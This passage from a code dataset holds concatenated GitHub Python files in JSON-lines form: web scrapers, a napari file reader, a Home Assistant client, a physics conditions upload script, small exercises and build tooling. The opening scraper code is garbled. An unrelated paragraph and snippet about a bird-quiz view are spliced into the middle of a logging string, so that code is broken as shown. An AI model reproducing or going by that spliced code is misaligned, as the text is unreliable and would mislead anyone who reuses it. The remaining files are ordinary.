#print(ele.get('href'))\r\nlogging.info(\"Third of three starter pages parsed, all movies added\")\r\n#while len(all_movies)<125 or len(all_actors)<250:\r\n\r\nfor movie in all_movies:\r\n    url = \"https://en.wikipedia.org\"+movie\r\n    logging.debug(\"Accessing page \"+movie+\" to find 
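The bird-quiz view above collects four distinct wrong answers with a rejection loop; random.sample guarantees distinctness in a single call. A sketch against a plain list rather than a Django queryset:

import random

names = ["robin", "sparrow", "heron", "owl", "finch", "wren"]
correct = names[0]

# Sample 4 distinct decoys from everything except the correct answer.
decoys = random.sample([n for n in names if n != correct], 4)
choices = decoys[:]
choices.insert(random.randint(0, 4), correct)  # 5 options, correct at a random slot
print(choices)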
actors\")\r\n    r = requests.get(url)\r\n    data = r.content\r\n    soup = BeautifulSoup(data, 'html.parser')\r\n    pattern = re.compile(r'Starring')\r\n    tags = soup.find(text=pattern).parent\r\n    tag2 = tags.findNext('ul')\r\n    link = tag2.findAll('a')\r\n    tempActors=[]\r\n    for ele in link:\r\n        if ele.get('href').find(\"wiki\") != -1:  # check the href string; Tag.find() would look for a <wiki> child tag\r\n            all_actors.append(ele.get('href'))\r\n            tempActors.append(ele.get('href')[6:])\r\n    logging.info(\"All actors from page\" +movie+ \" added\")\r\n    pattern = re.compile(r'Release date')\r\n    tags = soup.find(text=pattern)\r\n    if tags is None:\r\n        logging.warning(\"Could not find the release date from \" +movie+\": Skipping this page\")\r\n        continue\r\n    \r\n    tag2 = tags.parent.findNext('ul')\r\n    tag3 = tag2.findNext('li')\r\n    tempYear = tag3.text\r\n    tempYear = tempYear.replace(u'\\xa0', u' ')\r\n    logging.info(\"Added release date from page\" +movie)\r\n    pattern = re.compile(r'Box office')\r\n    tags = soup.find(text=pattern)\r\n    if tags is None:\r\n        logging.warning(\"Could not find the movie gross from \" +movie+\": Skipping this page\")\r\n        continue\r\n    tag2 = tags.parent.findNext('td')\r\n    tempGross = tag2.text\r\n    if tempGross[-1] == ']':\r\n        tempGross = tag2.text[:-3]\r\n    logging.info(\"Added total gross from page\" +movie)\r\n    result = (movie[6:], tempYear, tempGross, tempActors)\r\n    json_movies.append(result)\r\n    print(result)\r\n    moviedict[movie[6:]]=(tempYear, tempGross, tempActors) \r\n\r\nlogging.debug(\"Accessing actor list to find age\")\r\n\r\nall_actors=list(set(all_actors))\r\n\r\nwhile len(json_actors)<300:\r\n    for actor in all_actors:\r\n        url = \"https://en.wikipedia.org\"+actor\r\n        r = requests.get(url)\r\n        data = r.content\r\n        soup = BeautifulSoup(data, 'html.parser')\r\n        tags = soup.find('span',{'class' : 'noprint ForceAgeToShow'})\r\n        if tags is None:\r\n            logging.warning(\"Could not find the actor age for \" +actor+\": Skipping this page\")\r\n            continue\r\n        json_actors.append((actor[6:], tags.text[5:-1]))\r\n        print(actor[6:], tags.text[5:-1])\r\n        actordict[actor[6:]]=tags.text[5:-1]\r\n        logging.info(\"Moving on to the next actor\")\r\nprint(len(json_movies))\r\nprint(len(json_actors))\r\nprint(json_movies)\r\nprint(json_actors)\r\n\r\nwith open('moviedata.txt', 'w+') as outfile:\r\n    json.dump(json_movies, outfile)\r\nwith open('actordata.txt', 'w+') as outfile:\r\n    json.dump(json_actors, outfile) \r\nwith open('moviedict.txt', 'w+') as outfile:\r\n    json.dump(moviedict, outfile)\r\nwith open('actordict.txt', 'w+') as outfile:\r\n    json.dump(actordict, outfile) \r\n","repo_name":"KaiwenXue/Projects","sub_path":"Webspider/scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5926380646","text":"\"\"\"\nThis module is an example of a barebones numpy reader plugin for napari.\n\nIt implements the Reader specification, but your plugin may choose to\nimplement multiple readers or even other plugin contributions. 
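The movie loop above locates infobox fields by matching label text and hopping to the nearest following element. The same find(text=...) / parent / findNext navigation on a tiny inline document, so the pattern is visible without a network call:

import re
from bs4 import BeautifulSoup

html = """
<table>
  <tr><th>Box office</th><td>$100 million</td></tr>
</table>
"""
soup = BeautifulSoup(html, "html.parser")

label = soup.find(text=re.compile(r"Box office"))  # NavigableString inside the <th>
if label is not None:
    value = label.parent.findNext("td").text       # walk up, then to the value cell
    print(value)  # -> $100 million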
see:\nhttps://napari.org/stable/plugins/guides.html?#readers\n\"\"\"\nimport mrcfile\nimport numpy as np\n\n\ndef napari_get_reader(path):\n \"\"\"A basic implementation of a Reader contribution.\n\n Parameters\n ----------\n path : str or list of str\n Path to file, or list of paths.\n\n Returns\n -------\n function or None\n If the path is a recognized format, return a function that accepts the\n same path or list of paths, and returns a list of layer data tuples.\n \"\"\"\n if isinstance(path, list):\n # reader plugins may be handed single path, or a list of paths.\n # if it is a list, it is assumed to be an image stack...\n # so we are only going to look at the first file.\n path = path[0]\n\n # if we know we cannot read the file, we immediately return None.\n extensions = (\n '.mrc',\n '.mrcs',\n '.map',\n '.st',\n '.rec',\n '.preali',\n '.ali',\n )\n if not path.endswith(extensions):\n return None\n\n # otherwise we return the *function* that can read ``path``.\n return reader_function\n\n\ndef reader_function(path):\n \"\"\"Take a path or list of paths and return a list of LayerData tuples.\n\n Readers are expected to return data as a list of tuples, where each tuple\n is (data, [add_kwargs, [layer_type]]), \"add_kwargs\" and \"layer_type\" are\n both optional.\n\n Parameters\n ----------\n path : str or list of str\n Path to file, or list of paths.\n\n Returns\n -------\n layer_data : list of tuples\n A list of LayerData tuples where each tuple in the list contains\n (data, metadata, layer_type), where data is a numpy array, metadata is\n a dict of keyword arguments for the corresponding viewer.add_* method\n in napari, and layer_type is a lower-case string naming the type of layer.\n Both \"meta\", and \"layer_type\" are optional. napari will default to\n layer_type==\"image\" if not provided\n \"\"\"\n # handle both a string and a list of strings\n paths = [path] if isinstance(path, str) else path\n\n # optional kwargs for the corresponding viewer.add_* method\n # https://napari.org/docs/api/napari.components.html#module-napari.components.add_layers_mixin\n add_kwargs = {}\n\n # optional, default is \"image\"\n layer_type = \"image\"\n\n # load all files into array\n layer_data = []\n for _path in paths:\n\n # Read mrcfile as a memory mapped file\n data = mrcfile.mmap(_path, permissive=True).data\n\n # Append two layers if the data type is complex\n if data.dtype in [np.complex64, np.complex128]:\n layer_data.append((np.abs(data), {\"name\": \"amplitude\"}, layer_type))\n layer_data.append((np.angle(data), {\"name\": \"phase\"}, layer_type))\n else:\n layer_data.append((data, add_kwargs, layer_type))\n\n return layer_data\n","repo_name":"alisterburt/napari-mrcfile-reader","sub_path":"src/napari_mrcfile_reader/_reader.py","file_name":"_reader.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"50"} +{"seq_id":"33320374824","text":"# -*- coding: utf-8 -*-\n\nfrom architect.manager.client import BaseClient\nimport homeassistant.remote as remote\nfrom homeassistant.exceptions import HomeAssistantError\nfrom celery.utils.log import get_logger\n\nlogger = get_logger(__name__)\n\nDEFAULT_RESOURCES = [\n 'hass_entity',\n]\n\n\nclass HomeAssistantClient(BaseClient):\n\n def __init__(self, **kwargs):\n super(HomeAssistantClient, self).__init__(**kwargs)\n\n def auth(self):\n status = True\n try:\n self.api = remote.API(self.metadata['host'],\n self.metadata['password'],\n self.metadata.get('port', 
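The napari reader above follows the plugin contract: a hook that returns None or a callable yielding (data, add_kwargs, layer_type) tuples. A sketch of a caller consuming it; the import path follows this record's sub_path, and the file name is a hypothetical example:

from napari_mrcfile_reader._reader import napari_get_reader  # module path per this record

path = "tomogram.mrc"  # assumed example file
reader = napari_get_reader(path)
if reader is not None:
    for data, add_kwargs, layer_type in reader(path):
        # Each tuple maps onto a viewer.add_* call in napari.
        print(layer_type, add_kwargs.get("name", "unnamed"), data.shape)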
8123),\n self.metadata.get('use_ssl', False))\n except HomeAssistantError as exception:\n logger.error(exception)\n status = False\n return status\n\n def update_resources(self, resources=None):\n if self.auth():\n if resources is None:\n resources = DEFAULT_RESOURCES\n for resource in resources:\n metadata = self.get_resource_metadata(resource)\n self.process_resource_metadata(resource, metadata)\n count = len(self.resources.get(resource, {}))\n logger.info(\"Processed {} {} resources\".format(count,\n resource))\n self.process_relation_metadata()\n\n def get_resource_status(self, kind, metadata):\n return 'unknown'\n\n def get_resource_metadata(self, kind):\n logger.info(\"Getting {} resources\".format(kind))\n response = []\n if kind == 'hass_entity':\n response = remote.get_states(self.api)\n return response\n\n def process_resource_metadata(self, kind, metadata):\n if kind == 'hass_entity':\n for resource in metadata:\n metadata = resource.as_dict()\n if 'last_changed' in metadata:\n metadata['last_changed'] = metadata['last_changed'].isoformat()\n if 'last_updated' in metadata:\n metadata['last_updated'] = metadata['last_updated'].isoformat()\n self._create_resource(metadata['entity_id'],\n metadata['entity_id'],\n 'hass_entity',\n metadata=metadata)\n\n def process_relation_metadata(self):\n pass\n","repo_name":"perlchild/architect-api","sub_path":"architect/manager/engine/homeassistant/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"50"} +{"seq_id":"40119070180","text":"import sqlite3\nimport json\nimport subprocess\nimport shutil\n\n# Open the SQLite database file\nconn = sqlite3.connect('test_myTagName.db')\ncursor = conn.cursor()\n\n# Execute the SELECT query\ncursor.execute('SELECT * FROM IOV')\n\n# Fetch all the results from the query\nresults = cursor.fetchall()\n\n# Create an empty list to store the extracted values\nextracted_values = []\n\n# Extract the desired part of the string and add it to the list\nfor row in results:\n value = row[0].split('|')[0].strip()\n extracted_values.append(value)\n\n# Close the database connection\nconn.close()\n\n# Generate the JSON file and execute the command for each extracted value\nfor value in extracted_values:\n print(\"uploading\",value)\n # Create the dictionary for the JSON structure\n data = {\n \"destinationDatabase\": \"oracle://cms_orcoff_prep/CMS_CONDITIONS\",\n \"destinationTags\": {\n \"SimBeamSpot_\" + value + \"_v1_mc\": {}\n },\n \"inputTag\": value,\n \"since\": None,\n \"userText\": value\n }\n \n # Generate the JSON file\n filename = \"test_myTagName.txt\"\n with open(filename, 'w') as file:\n json.dump(data, file, indent=4)\n \n # Execute the command to upload conditions\n subprocess.call([\"uploadConditions.py\", \"test_myTagName.db\"])\n\n # Generate the new filename\n new_filename = \"test_\" + value + \".txt\"\n \n # Move the file to the new name\n shutil.move(filename, new_filename)\n\n # Print a success message\n print(\"Uploaded conditions for value:\", value)\n","repo_name":"cms-sw/cmssw","sub_path":"CondTools/BeamSpot/test/extractAndUploadAll.py","file_name":"extractAndUploadAll.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"27363800298","text":"\"\"\"A Python Flask REST API BoilerPlate (CRUD) Style\"\"\"\n\nimport argparse\nimport os\nfrom dotenv import load_dotenv\nfrom backend import 
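The CMSSW script above derives tag names by splitting pipe-delimited IOV rows before writing per-tag upload metadata. The row parsing in isolation, with an in-memory database standing in for test_myTagName.db:

import sqlite3

conn = sqlite3.connect(":memory:")  # stand-in for test_myTagName.db
conn.execute("CREATE TABLE IOV (payload TEXT)")
conn.execute("INSERT INTO IOV VALUES ('BeamSpot_Realistic25ns | 2023-01-01')")

extracted = [
    row[0].split("|")[0].strip()          # keep only the tag name before the pipe
    for row in conn.execute("SELECT * FROM IOV")
]
print(extracted)  # -> ['BeamSpot_Realistic25ns']
conn.close()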
create_app\n\nload_dotenv()\n\nAPP = create_app()\n\nif __name__ == '__main__':\n PARSER = argparse.ArgumentParser(\n description=\"Casting Agency - FSND Capstone app\")\n\n PARSER.add_argument('--debug', action='store_true',\n help=\"\"\"Use flask debug/dev mode with file\n change reloading\"\"\")\n ARGS = PARSER.parse_args()\n\n PORT = int(os.environ.get('PORT', 5000))\n\n if ARGS.debug:\n print(\"Running in debug mode\")\n APP.run(host='0.0.0.0', port=PORT, debug=True)\n else:\n APP.run(host='0.0.0.0', port=PORT, debug=False)\n","repo_name":"zoom2ashish/fsnd-capstone","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"27625701394","text":"from common.dataset_pool import DatasetPool\nfrom embeddings.embedding_node2vec import Node2VecEmbedding\n\n\ndef test_reconstuction_evaluation():\n # first case\n\n graph = DatasetPool.load(\"cora_ml\")\n emb_m = Node2VecEmbedding(graph, 10, 1, 1)\n emb_m.embed()\n\n undirected_projection = graph.to_undirected()\n print(\"#nodes = \", undirected_projection.nodes_cnt())\n print(\"#edges = \", undirected_projection.edges_cnt())\n\n num_links = undirected_projection.edges_cnt()\n\n reconstructed_graph = emb_m.reconstruct(num_links)\n print(\"#nodes = \", reconstructed_graph.nodes_cnt())\n print(\"#edges = \", reconstructed_graph.edges_cnt())\n\n # graph reconstruction evaluation\n precision_val = undirected_projection.link_precision(reconstructed_graph)\n map_val, _ = undirected_projection.map_value(reconstructed_graph)\n recall_val, _ = undirected_projection.recall(reconstructed_graph)\n\n print(\"PRECISION@K = \", precision_val, \"MAP = \", map_val, \", RECALL = \", recall_val)\n\n # second case\n\n graph = DatasetPool.load(\"cora_ml\").to_undirected()\n emb_m = Node2VecEmbedding(graph, 10, 1, 1)\n emb_m.embed()\n\n print(\"#nodes = \", graph.nodes_cnt())\n print(\"#edges = \", graph.edges_cnt())\n\n num_links = graph.edges_cnt()\n\n reconstructed_graph = emb_m.reconstruct(num_links)\n print(\"#nodes = \", reconstructed_graph.nodes_cnt())\n print(\"#edges = \", reconstructed_graph.edges_cnt())\n\n # graph reconstruction evaluation\n precision_val = graph.link_precision(reconstructed_graph)\n map_val, _ = graph.map_value(reconstructed_graph)\n recall_val, _ = graph.recall(reconstructed_graph)\n\n print(\"PRECISION@K = \", precision_val, \"MAP = \", map_val, \", RECALL = \", recall_val)\n\n\nif __name__ == \"__main__\":\n test_reconstuction_evaluation()\n","repo_name":"graphsinspace/graspe","sub_path":"src/graspe/tests/test_rec_eval.py","file_name":"test_rec_eval.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"7166782687","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom matplotlib.colors import ListedColormap\n\ndef plot_decision_regions(X, y, classifier, resolution = 0.02):\n\n # Setup the marker generator and color map\n markers = (\"s\", \"x\", \"o\", \"^\", \"v\")\n colors = (\"red\", \"blue\", \"lightgreen\", \"gray\", \"cyan\")\n colorMap = ListedColormap(colors[:len(np.unique(y))])\n\n # Plot the decision surface (setting the boundries of the graph)\n x1_min = X[:, 0].min() - 1 # The minimum value for feature 0, the sepal length, of the setosa data\n x1_max = X[:, 0].max() + 1 # The maximum value for feature 0, the sepal length, of the versicolor data\n\n x2_min = X[:, 1].min() - 1 # 
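test_reconstuction_evaluation above scores a reconstructed graph with link precision against the true edge set. Stripped of the graph classes, the metric reduces to a set intersection over the top-k predicted links; the helper below is a hypothetical sketch, not graspe's API:

def link_precision(true_edges, predicted_edges, k):
    """Fraction of the top-k predicted links that exist in the true graph."""
    true_set = {tuple(sorted(e)) for e in true_edges}       # undirected edges
    top_k = [tuple(sorted(e)) for e in predicted_edges[:k]]
    return sum(e in true_set for e in top_k) / k

truth = [(0, 1), (1, 2), (2, 3)]
ranked = [(1, 0), (3, 2), (0, 2)]  # predictions ordered by score
print(link_precision(truth, ranked, k=3))  # -> 0.666...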
The minimum value for feature 1, the petal length, of the versicolor data\n    x2_max = X[:, 1].max() + 1 # The maximum value for feature 1, the petal length, of the versicolor data\n\n    print(\"x1_min: \" + str(x1_min))\n    print(\"x1_max: \" + str(x1_max))\n\n    print(\"x2_min: \" + str(x2_min))\n    print(\"x2_max: \" + str(x2_max))\n\n    # Create a meshgrid of aligned coordinates from the two vectors x1 and x2\n    xx1, xx2 = np.meshgrid(\n        np.arange(x1_min, x1_max, resolution), # Return evenly spaced values over the interval\n        np.arange(x2_min, x2_max, resolution)\n    )\n\n    # Set vector Z to the class label predictions of the corresponding grid points\n    Z = classifier.predict(\n        np.array(\n            [xx1.ravel(), xx2.ravel()]\n        ).T\n    )\n\n    # Reshape the vector Z to be the same size (same number of columns)\n    # as the two-feature matrix so that it can be\n    # graphed & predicted just like the Iris training subset\n    Z = Z.reshape(xx1.shape)\n\n    # Graph the trained (predicted) data\n    plt.contourf(\n        xx1, xx2,\n        Z,\n        alpha = 0.3,\n        cmap = colorMap\n    )\n\n    # Clamp the axis limits to the meshgrid extent so the contour fills the plot\n    plt.xlim(xx1.min(), xx1.max())\n    plt.ylim(xx2.min(), xx2.max())\n\n    # Plot the class samples\n    for idx, cl in enumerate(np.unique(y)):\n        plt.scatter(\n            x = X[y == cl, 0], # Plot feature 1/0\n            y = X[y == cl, 1], # Plot feature 2/1\n            alpha = 0.8, # Transparency\n            c = colors[idx],\n            marker = markers[idx],\n            label = cl,\n            edgecolor = \"black\"\n        )\n","repo_name":"mattnappo/machine-learning","sub_path":"linear_classification/decision_regions.py","file_name":"decision_regions.py","file_ext":"py","file_size_in_byte":2360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"5357359528","text":"def slices(series, length):\n    if not series:\n        raise ValueError('empty series')\n    if length > len(series) or length <= 0:\n        raise ValueError('invalid input')\n\n    substrings = []\n    for i in range(len(series) - (length - 1)):\n        substrings.append(series[i:i + length])\n    return substrings\n","repo_name":"pwnsaur/exercism","sub_path":"python/series/series.py","file_name":"series.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"25478876871","text":"from foundation_test.util.db.db_util import DataBase\nimport pytest\n\n\nDB = {\n    \"china\": {\n        'fox': 'qsq_fox{0}'\n    },\n    \"thailand\": {\n        'fox': 'arcticfox-thailand'\n    },\n    \"philippines\": {\n        'fox': 'arcticfox-philippines'\n    },\n    \"mexico\": {\n        'fox': 'arcticfox-mexico'\n    },\n    \"india\": {\n        'fox': 'arcticfox-india'\n    },\n    \"pakistan\": {\n        'fox': 'arcticfox-pakistan'\n    }\n}\n\nDEFAULT_OPT = {\n    \"--env\": 1,\n    \"--country\": 'china',\n    \"--environment\": 'test'\n}\n\n\ndef get_sysconfig(option):\n    return pytest.config.getoption(option) if hasattr(pytest, 'config') else DEFAULT_OPT[option]\n\n\nENV = get_sysconfig('--env')\nCOUNTRY = get_sysconfig('--country')\nENVIRONMENT = get_sysconfig('--environment')\n\n\nDH_DB = DataBase(DB[COUNTRY]['fox'].format(ENV), ENVIRONMENT) if COUNTRY == 'china' \\\n    else DataBase(DB[COUNTRY]['fox'], ENVIRONMENT)\n\n\ndef init_dh_env(env, country, environment):\n    global DH_DB\n    # Supported countries: china, thailand, philippines, mexico, pakistan, india\n    DH_DB = DataBase(DB[country]['fox'].format(env), environment) if country == 'china' \\\n        else DataBase(DB[country]['fox'], environment)\n\n\ndef init_env(env, country, environment):\n    # 
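plot_decision_regions above evaluates the classifier on a ravelled meshgrid and reshapes the predictions back into the grid shape before contourf can draw regions. The core of that trick with a toy stand-in classifier, independent of the Iris data:

import numpy as np

class ThresholdClassifier:
    # Toy stand-in: class 1 when x1 + x2 > 0, else class 0.
    def predict(self, X):
        return (X[:, 0] + X[:, 1] > 0).astype(int)

xx1, xx2 = np.meshgrid(np.arange(-1, 1, 0.5), np.arange(-1, 1, 0.5))
grid = np.array([xx1.ravel(), xx2.ravel()]).T  # one (x1, x2) row per grid point
Z = ThresholdClassifier().predict(grid)
Z = Z.reshape(xx1.shape)  # back to the grid so contourf could draw the regions
print(Z)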
Initialize the tool environment\n    init_dh_env(env, country, environment)\n\n\n# pytest environment initialization\ninit_env(env=get_sysconfig('--env'), country=get_sysconfig('--country'), environment=get_sysconfig('--environment'))\n","repo_name":"xiujingyuan/framework-test","sub_path":"foundation_test/config/dh/db_const.py","file_name":"db_const.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34655599444","text":"_author_ = 'jake'\n_project_ = 'leetcode'\n\n# https://leetcode.com/problems/single-number/\n# Given an array of integers, every element appears twice except for one. Find that single one.\n\n# Any number xor with itself is zero.\n# Time - O(n)\n# Space - O(1)\n\nclass Solution(object):\n    def singleNumber(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        xor = 0\n        for num in nums:\n            xor ^= num\n        return xor","repo_name":"jakehoare/leetcode","sub_path":"python_1_to_1000/136_Single_Number.py","file_name":"136_Single_Number.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"50"} +{"seq_id":"7534475978","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef get_last_page(URL):\n    result = requests.get(URL)\n    soup = BeautifulSoup(result.text, \"html.parser\")\n    pages = soup.find(\"div\", {\"class\": \"s-pagination\"}).find_all(\"a\")\n    last_page = pages[-2].get_text(strip=True)\n    return int(last_page)\n\n\ndef extra_job(html):\n    title = html.find(\"h2\", {\"class\": \"fs-body3\"}).find(\"a\")[\"title\"]\n    company, location = html.find(\"h3\", {\n        \"class\": \"fs-body1\"\n    }).find_all(\n        \"span\", recursive=False)\n    company = company.get_text(strip=True)\n    location = location.get_text(strip=True)\n    job_id = html[\"data-jobid\"]\n    return {\n        \"title\": title,\n        \"company\": company,\n        \"location\": location,\n        \"apply_link\": f\"https://stackoverflow.com/jobs/{job_id}\"\n    }\n\n\ndef extra_jobs(last_page, URL):\n    jobs = []\n    for page in range(last_page):\n        print(f\"Scraping SO page: {page}\")\n        result = requests.get(f\"{URL}?pg={page+1}\")\n        soup = BeautifulSoup(result.text, \"html.parser\")\n        results = soup.find_all(\"div\", {\"class\": \"-job\"})\n        for result in results:\n            job = extra_job(result)\n            jobs.append(job)\n    return jobs\n\n\ndef get_jobs(word):\n    URL = f\"https://stackoverflow.com/jobs?q={word}&sort=1\"\n    last_page = get_last_page(URL)\n    jobs = extra_jobs(last_page, URL)\n    return jobs\n","repo_name":"Action2theFuture/WEBScrapper2","sub_path":"Scrapper.py","file_name":"Scrapper.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"30286105933","text":"import random\nimport secrets\n\n# Ask for the plain text that should be encrypted\nalphabetisch = input(\"You can write the text here that \" \\\n                     \"you would like to have encrypted:\")\n# Convert everything to binary and build the list e\ndef binar(alphabetisch):\n    a, b = [], []\n    for i in alphabetisch:\n        a.append(ord(i))\n    for i in a:\n        b.append((bin(i)[2:]).zfill(8))\n    return b\ne = binar(alphabetisch)\nprint (e)\nglobal z\nz = 0\nfor i in e:\n    z = z + 1\nprint(z)\nprint(len(e))\nfor i in range(81 - len(e)):\n    zufzhl = random.randint(129, 255)\n    e.append(bin(zufzhl)[2:])\n    z = 81\nprint(e)\n\n\n\n#SUBSTITUTION-BOX\n#TRANSPOSITION SHIFTS\n#Key generation\ndef schlüsselgenerator():\n    schlüssel_länge_bytes = 16\n    key = 
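The single-number record above folds xor over the array so paired values cancel each other out. The same fold as a one-liner with functools.reduce, equivalent to the explicit loop:

from functools import reduce
import operator

nums = [4, 1, 2, 1, 2]
print(reduce(operator.xor, nums, 0))  # -> 4; every duplicate cancels itself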
secrets.token_bytes(schlüssel_länge_bytes)\n    return key\ndef bytes_zu_binary(byte_str):\n    return \"\".join(f\"{byte:08b}\" for byte in byte_str)\ndef keykleinermachen(key_str):\n    smaller_keys = [key_str[i:i+8] for i in range(0, len(key_str), 8)]\n    return smaller_keys\nschlüssel = schlüsselgenerator()\nbinärer_schlüssel = bytes_zu_binary(schlüssel)\nsmaller_keys = keykleinermachen(binärer_schlüssel)\nfor i, key in enumerate(smaller_keys, 1):\n    globals()[f\"key{i}\"] = key\nprint(binärer_schlüssel)\nprint(key1)\nprint(key2)\nprint(key3)\nprint(key4)\nprint(key5)\nprint(key6)\nprint(key7)\nprint(key8)\nprint(key9)\n\n\n#DISPLACEMENT\n\n#KEY INFUSION\n#Transposition shifts\n\n#Key infusion\n","repo_name":"AlicanKaratasli/Matura-Arbeit-AEBC","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"de","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"18002721471","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\nfrom .settings import Settings\nfrom .updates import Updates\nfrom .list import List\nfrom . import repo\ntry:\n    from .flatpak import Flatpak\nexcept (ImportError, ValueError):\n    Flatpak = False\n\nfrom gettext import gettext as _ \n\nclass Stack(Gtk.Box):\n\n    def __init__(self, parent):\n        Gtk.Box.__init__(self, orientation=Gtk.Orientation.VERTICAL, spacing=6)\n        self.parent = parent\n        try:\n            self.system_repo = repo.get_system_repo()\n        except:\n            self.system_repo = None\n        self.sources = {}\n        self.errors = {}\n        self.sources, self.errors = repo.get_all_sources()\n\n        self.stack = Gtk.Stack()\n        self.stack.set_transition_type(Gtk.StackTransitionType.SLIDE_LEFT_RIGHT)\n        self.stack.set_transition_duration(300)\n\n        self.setting = Settings(self)\n        self.stack.add_titled(self.setting, \"settings\", _(\"Settings\"))\n        \n        self.updates = Updates(self)\n        self.stack.add_titled(self.updates, \"updates\", _(\"Updates\"))\n        \n        self.list_all = List(self)\n        self.stack.add_titled(self.list_all, \"list\", _(\"Extra Sources\"))\n        \n        if Flatpak:\n            self.flatpak = Flatpak(self)\n\n        if Flatpak:\n            self.stack.add_titled(self.flatpak, \"flatpak\", _(\"Flatpak\"))\n\n        self.pack_start(self.stack, True, True, 0)\n\n\n","repo_name":"PikaOS-Linux/pkgs-baseos","sub_path":"repoman/archive/repoman/stack.py","file_name":"stack.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"52"} +{"seq_id":"27100266501","text":"\"\"\"Profile decorator for profiling functions.\"\"\"\nimport cProfile\nimport pstats\nimport io\n\n\nclass profile_deco:\n\n    def __init__(self, function):\n        self.prof = cProfile.Profile()\n        # Store the function being profiled.\n        self.function = function\n\n    def __call__(self, *args, **kwargs):\n        # Propagate the wrapped function's return value.\n        return self.prof.runcall(self.function, *args, **kwargs)\n\n    def print_stat(self):\n        \"\"\"Print cumulative statistics about the function.\"\"\"\n        s = io.StringIO()\n        ps = pstats.Stats(self.prof, stream=s).sort_stats(\"cumulative\")\n        ps.print_stats()\n        print(s.getvalue())\n\n\n@profile_deco\ndef add(a, b):\n    return a + b\n\n\n@profile_deco\ndef sub(a, b):\n    return a - b\n\n\nadd(1, 2)\nadd(4, 5)\nsub(4, 5)\n\nadd.print_stat()\nsub.print_stat()\n","repo_name":"Geolan84/DeepPython","sub_path":"08/profile_decorator.py","file_name":"profile_decorator.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37870464193","text":"from pants import (\n    
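The profile_deco class above replaces the decorated function with an instance, which hides its name and docstring from introspection. A closure-based variant using functools.wraps keeps that metadata intact while still accumulating profile stats; a sketch, not the repository's implementation:

import cProfile
import functools
import io
import pstats

def profiled(function):
    prof = cProfile.Profile()

    @functools.wraps(function)  # preserves __name__ / __doc__
    def wrapper(*args, **kwargs):
        return prof.runcall(function, *args, **kwargs)

    def print_stat():
        s = io.StringIO()
        pstats.Stats(prof, stream=s).sort_stats("cumulative").print_stats()
        print(s.getvalue())

    wrapper.print_stat = print_stat  # expose stats alongside the wrapper
    return wrapper

@profiled
def mul(a, b):
    return a * b

assert mul(3, 4) == 12
mul.print_stat()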
InternalTarget,\n JavaLibrary,\n JavaProtobufLibrary,\n JavaTests,\n JavaThriftLibrary,\n ScalaLibrary,\n ScalaTests,\n is_jvm,\n)\n\ndef extract_target(java_targets, name = None):\n \"\"\"Extracts a minimal set of linked targets from the given target's internal transitive dependency\n set. The root target in the extracted target set is returned. The algorithm does a topological\n sort of the internal targets and then tries to coalesce targets of a given type. Any target with\n a custom ant build xml will be excluded from the coalescing.\"\"\"\n\n # TODO(John Sirois): this is broken - representative_target is not necessarily representative\n representative_target = list(java_targets)[0]\n\n meta_target_base_name = \"fast-%s\" % (name if name else representative_target.name)\n provides = None\n deployjar = hasattr(representative_target, 'deployjar') and representative_target.deployjar\n buildflags = representative_target.buildflags\n\n def create_target(target_type, target_name, target_index, targets):\n def name(name):\n return \"%s-%s-%d\" % (target_name, name, target_index)\n\n if target_type == JavaProtobufLibrary:\n return JavaProtobufLibrary._aggregate(name('protobuf'), provides, buildflags, targets)\n elif target_type == JavaThriftLibrary:\n return JavaThriftLibrary._aggregate(name('thrift'), provides, buildflags, targets)\n elif target_type == JavaLibrary:\n return JavaLibrary._aggregate(name('java'), provides, deployjar, buildflags, targets)\n elif target_type == ScalaLibrary:\n return ScalaLibrary._aggregate(name('scala'), provides, deployjar, buildflags, targets)\n elif target_type == JavaTests:\n return JavaTests._aggregate(name('java-tests'), buildflags, targets)\n elif target_type == ScalaTests:\n return ScalaTests._aggregate(name('scala-tests'), buildflags, targets)\n else:\n raise Exception(\"Cannot aggregate targets of type: %s\" % target_type)\n\n # chunk up our targets by type & custom build xml\n coalesced = InternalTarget.coalesce_targets(java_targets)\n coalesced = list(reversed(coalesced))\n\n start_type = type(coalesced[0])\n start = 0\n descriptors = []\n\n for current in range(0, len(coalesced)):\n current_target = coalesced[current]\n current_type = type(current_target)\n\n if current_target.custom_antxml_path:\n if start < current:\n # if we have a type chunk to our left, record it\n descriptors.append((start_type, coalesced[start:current]))\n\n # record a chunk containing just the target that has 